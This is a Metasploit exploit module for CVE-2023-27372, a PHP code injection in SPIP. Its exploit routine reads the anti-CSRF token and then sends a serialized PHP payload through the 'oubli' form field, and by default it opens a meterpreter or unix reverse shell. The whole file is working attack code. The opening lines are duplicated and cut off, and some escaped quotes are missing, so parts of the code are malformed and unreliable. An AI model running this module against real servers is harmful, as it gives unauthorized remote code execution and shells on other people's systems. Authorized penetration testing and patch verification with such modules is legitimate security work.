# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exp ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'SPIP form PHP Injection',
'Description' => %q{
This module exploits a PHP code injection in SPIP. The vulnerability exists in the
oubli parameter and allows an unauthenticated user to execute arbitrary commands
with web user privileges. Branches 3.2, 4.0, 4.1 and 4.2 are concerned. Vulnerable versions
are <3.2.18, <4.0.10, <4.1.18 and <4.2.1.
},
'Author' => [
'coiffeur', # Initial discovery
'Laluka', # PoC
'Julien Voisin' # MSF module
],
'License' => MSF_LICENSE,
'References' => [
[ 'URL', 'https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-2-1-SPIP-4-1-8-SPIP-4-0-10-et.html' ],
[ 'URL', 'https://therealcoiffeur.com/c11010' ],
[ 'CVE', '2023-27372' ],
],
'Privileged' => false,
'Platform' => %w[php linux unix],
'Arch' => [ARCH_PHP, ARCH_CMD],
'Targets' => [
[
'Automatic (PHP In-Memory)',
{
'Platform' => 'php',
'Arch' => ARCH_PHP,
'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' },
'Type' => :php_memory,
'Payload' => {
'BadChars' => "x22x00"
}
}
],
[
'Automatic (Unix In-Memory)',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
'Type' => :unix_memory,
'Payload' => {
'BadChars' => "x22x00x27"
}
}
],
],
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'Reliability' => [ REPEATABLE_SESSION ],
'SideEffects' => [IOC_IN_LOGS]
},
'DefaultTarget' => 0,
'DisclosureDate' => '2023-02-27'
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to SPIP application', '/']),
]
)
end
def check
uri = normalize_uri(target_uri.path, 'spip.php')
res = send_request_cgi({ 'uri' => uri.to_s })
return Exploit::CheckCode::Unknown('Target is unreachable.') unless res
return Exploit::CheckCode::Unknown("Target responded with unexpected HTTP response code: #{res.code}") unless res.code == 200
version_string = res.get_html_document.at('head/meta[@name="generator"]/@content')&.text
return Exploit::CheckCode::Unknown('Unable to find the version string on the page: spip.php') unless version_string =~ /SPIP (.*)/
version = ::Regexp.last_match(1)
if version.nil? && res.headers['Composed-By'] =~ /SPIP (.*) @/
version = ::Regexp.last_match(1)
end
return Exploit::CheckCode::Unknown('Unable to determine the version of SPIP') unless version
print_status("SPIP Version detected: #{version}")
rversion = Rex::Version.new(version)
if rversion >= Rex::Version.new('4.2.0')
if rversion < Rex::Version.new('4.2.1')
return Exploit::CheckCode::Appears
end
elsif rversion >= Rex::Version.new('4.1.0')
if rversion < Rex::Version.new('4.1.18')
return Exploit::CheckCode::Appears
end
elsif rversion >= Rex::Version.new('4.0.0')
if rversion < Rex::Version.new('4.0.10')
return Exploit::CheckCode::Appears
end
elsif rversion >= Rex::Version.new('3.2.0')
if rversion < Rex::Version.new('3.2.18')
return Exploit::CheckCode::Appears
end
end
return Exploit::CheckCode::Safe
end
def execute_command(cmd, args = {})
send_request_cgi(
{
'uri' => args['uri'],
'method' => 'POST',
'vars_post' => {
'page' => 'spip_pass',
'lang' => 'fr',
'formulaire_action' => 'oubli',
'formulaire_action_args' => args['csrf'],
'oubli' => cmd
}
}
)
end
def exploit
uri = normalize_uri(target_uri.path, 'spip.php?page=spip_pass&lang=fr')
res = send_request_cgi({ 'uri' => uri })
fail_with(Msf::Exploit::Failure::Unreachable, "The request to uri: #{uri} did not respond") unless res
fail_with(Msf::Exploit::Failure::UnexpectedReply, "Got an http code that isn't 200: #{res.code}, when sending a request to uri: #{uri}") unless res&.code == 200
csrf = ''
unless (node = res.get_html_document.xpath('//form//input[@name="formulaire_action_args"]')).empty?
csrf = node.first['value']
end
print_status("Got anti-csrf token: #{csrf}")
print_status("#{rhost}:#{rport} - Attempting to exploit...")
oubli = ''
case target['Type']
when :php_memory
oubli = "s:#{payload.encoded.length + 6 + 2}:"<?php #{payload.encoded}?>";"
when :unix_memory
oubli = "s:#{payload.encoded.length + 14 + 4}:"<?php system('#{payload.encoded}')?>";"
end
execute_command(oubli, { 'uri' => uri, 'csrf' => csrf })
end
end